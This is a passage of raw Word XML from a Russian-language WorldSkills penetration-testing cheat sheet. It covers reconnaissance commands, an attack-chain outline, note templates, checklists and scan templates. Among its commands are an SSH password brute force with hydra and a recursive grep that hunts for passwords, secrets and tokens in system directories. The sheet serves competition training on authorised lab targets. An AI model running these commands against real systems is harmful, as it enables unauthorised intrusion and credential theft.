          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Следующие цели</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>5:30–6:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Flags, проверка, сдача</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Финальный результат</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>DISCOVERY</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ↓</w:t>
        <w:br/>
        <w:t>PORT SCAN</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ↓</w:t>
        <w:br/>
        <w:t>SERVICE ENUMERATION</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ↓</w:t>
        <w:br/>
        <w:t>FIND WEAKNESS</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ↓</w:t>
        <w:br/>
        <w:t>TARGETED ATTACK</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ↓</w:t>
        <w:br/>
        <w:t>INITIAL ACCESS</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ↓</w:t>
        <w:br/>
        <w:t>ENUMERATION AGAIN</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ↓</w:t>
        <w:br/>
        <w:t>PRIVILEGE ESCALATION</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ↓</w:t>
        <w:br/>
        <w:t>CREDENTIALS / KEYS</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ↓</w:t>
        <w:br/>
        <w:t>LATERAL MOVEMENT</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ↓</w:t>
        <w:br/>
        <w:t>FLAG / EVIDENCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>23. Фиксация результатов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># notes/targets.txt</w:t>
        <w:br/>
        <w:t>TARGET              PORTS              SERVICES              NOTES</w:t>
        <w:br/>
        <w:t>192.168.56.10       22,80,445          SSH/HTTP/SMB          ...</w:t>
        <w:br/>
        <w:br/>
        <w:t># notes/creds.txt</w:t>
        <w:br/>
        <w:t>HOST       USER       SECRET       SOURCE       VERIFIED</w:t>
        <w:br/>
        <w:t>...        ...        ...          ...          ...</w:t>
        <w:br/>
        <w:br/>
        <w:t># Формула заметки:</w:t>
        <w:br/>
        <w:t>time → host → service → finding → credential → next step</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>24. Быстрые карточки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>24.1 HTTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>nmap -sC -sV -p80,443,8080,8443 TARGET</w:t>
        <w:br/>
        <w:t>curl -I http://TARGET</w:t>
        <w:br/>
        <w:t>whatweb http://TARGET</w:t>
        <w:br/>
        <w:t>curl http://TARGET/robots.txt</w:t>
        <w:br/>
        <w:t>ffuf -u http://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt</w:t>
        <w:br/>
        <w:t># затем Burp: Proxy → History → Repeater</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>24.2 SMB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>nmap -sC -sV -p139,445 TARGET</w:t>
        <w:br/>
        <w:t>enum4linux-ng TARGET</w:t>
        <w:br/>
        <w:t>smbclient -L //TARGET -N</w:t>
        <w:br/>
        <w:t>smbmap -H TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>24.3 SSH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>nmap -sC -sV -p22 TARGET</w:t>
        <w:br/>
        <w:t>ssh USER@TARGET</w:t>
        <w:br/>
        <w:t># если перебор разрешён:</w:t>
        <w:br/>
        <w:t>hydra -l USER -P passwords-small.txt ssh://TARGET -t 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>24.4 Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>id</w:t>
        <w:br/>
        <w:t>sudo -l</w:t>
        <w:br/>
        <w:t>uname -a</w:t>
        <w:br/>
        <w:t>cat /etc/os-release</w:t>
        <w:br/>
        <w:t>ss -lntup</w:t>
        <w:br/>
        <w:t>find / -perm -4000 -type f 2&gt;/dev/null</w:t>
        <w:br/>
        <w:t>getcap -r / 2&gt;/dev/null</w:t>
        <w:br/>
        <w:t>grep -RniE 'password|passwd|secret|token' /etc /opt /var/www 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>25. Типовые ошибки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Начать с RockYou вместо enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Проверить только 1000 TCP-портов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Забыть UDP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Не проверить FQDN/Host header.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Не использовать Burp HTTP history.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Не проверить .git/.env/backups.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>После shell сразу идти в PrivEsc и пропустить конфиги/credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Не сохранять Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Тратить слишком много времени на одну гипотезу.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Не перепроверять найденные credentials на следующих разрешённых целях.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>26. Финальный чек-лист</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Все хосты из задания проверены.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>TCP полный диапазон проверен там, где это необходимо.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>UDP top ports проверены.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Версии сервисов записаны.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP: directories, vhosts, robots, backup/config/debug проверены.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>SMB: shares и права проверены.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>SSH/FTP: default и найденные credentials проверены.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>SNMP/LDAP/DB/RDP проверены при наличии портов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>После shell выполнен local enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>sudo/SUID/capabilities/cron/services/configs/secrets проверены.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Найденные credentials проверены на других разрешённых целях.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Флаги/артефакты записаны.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>27. Финальный шаблон серии сканов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>export TARGET="192.168.56.10"</w:t>
        <w:br/>
        <w:t>mkdir -p ~/WS-PENTEST/scans/$TARGET</w:t>
        <w:br/>
        <w:br/>
        <w:t>nmap -sC -sV $TARGET -oA ~/WS-PENTEST/scans/$TARGET/quick</w:t>
        <w:br/>
        <w:t>sudo nmap -p- -sV $TARGET -oA ~/WS-PENTEST/scans/$TARGET/full</w:t>
        <w:br/>
        <w:br/>
        <w:t>grep -E "^[0-9]+/(tcp|udp)" ~/WS-PENTEST/scans/$TARGET/*.nmap</w:t>
        <w:br/>
        <w:br/>
        <w:t>dig A $DOMAIN</w:t>
        <w:br/>
        <w:t>dig AAAA $DOMAIN</w:t>
        <w:br/>
        <w:t>dig MX $DOMAIN</w:t>
        <w:br/>
        <w:t>dig TXT $DOMAIN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Версия: v2. Расширенная турнирная шпаргалка. Все ключевые команды снабжены пояснением и вариантами применения. Используй только на разрешённых целях.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616">
      <w:footerReference w:type="default" r:id="rId9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WorldSkills Pentest Cheat Sheet —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